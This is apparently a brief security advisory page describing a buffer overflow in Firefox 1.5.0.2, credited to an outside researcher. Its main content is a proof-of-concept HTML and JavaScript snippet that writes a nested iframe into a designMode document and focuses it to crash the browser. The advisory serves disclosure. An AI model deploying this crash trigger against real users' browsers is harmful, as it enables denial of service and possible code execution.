|
Brought to you by:
Suppliers of:
|
|
|
| |
| Improper handling of Javascript content allows attackers to execute arbitrary code and crash Mozilla Firefox. |
| |
Credit:
The information has been provided by Chris.
The original article can be found at: http://www.securident.com/vuln/ff.txt
|
| |
Vulnerable Systems:
* Firefox 1.5.0.2
By using the Javascript bellow, Firefox will have a buffer overflow when it will attempt to use the new iframe that was written.
A focus on the iframe will cause Firefox to crash.
Proof of Concept:
< textarea cols="0" rows="0" id="x_OtherInfo" name="x_OtherInfo"></textarea>
< script>
var textarea = document.getElementsByName("x_OtherInfo");
textarea=textarea.item(0);
var htmlarea = document.createElement("div");
htmlarea.className = "htmlarea";
textarea.parentNode.insertBefore(htmlarea, textarea);
var iframe = document.createElement("iframe");
htmlarea.appendChild(iframe);
var doc = iframe.contentWindow.document;
doc.designMode = "on";
doc.open();
doc.write("<iframe src=''>");
iframe.contentWindow.focus()
doc.close();
< / script>
< / textarea>
|
|
blog comments powered by
|
|
|
